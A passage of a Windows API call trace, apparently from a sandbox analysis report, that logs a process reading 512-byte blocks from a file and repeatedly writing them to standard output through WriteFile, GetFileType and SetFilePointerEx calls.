_get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.161] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.161] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.162] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.162] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.162] GetFileType (hFile=0x50) returned 0x1 [0128.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.163] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.163] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.163] GetFileType (hFile=0x50) returned 0x1 [0128.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.164] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.164] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.164] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.165] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.165] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.165] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] GetFileType (hFile=0x50) returned 0x1 [0128.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.166] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.167] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.167] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] GetFileType (hFile=0x50) returned 0x1 [0128.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.167] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.168] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.168] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] GetFileType (hFile=0x50) returned 0x1 [0128.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.168] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] GetFileType (hFile=0x50) returned 0x1 [0128.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.169] WriteFile (in: hFile=0x50, lpBuffer=0x24ef0c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ef0c*, lpNumberOfBytesWritten=0x24df10*=0x20, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.170] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24defc | out: lpNewFilePointer=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.170] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ed7c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24edcc*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] GetFileType (hFile=0x50) returned 0x1 [0128.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.170] WriteFile (in: hFile=0x50, lpBuffer=0x24ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee1c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24ee6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24ee6c*, lpNumberOfBytesWritten=0x24df10*=0x50, lpOverlapped=0x0) returned 1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] GetFileType (hFile=0x50) returned 0x1 [0128.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.171] WriteFile (in: hFile=0x50, lpBuffer=0x24eebc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24df10, lpOverlapped=0x0 | out: lpBuffer=0x24eebc*, lpNumberOfBytesWritten=0x24df10*=0x50, 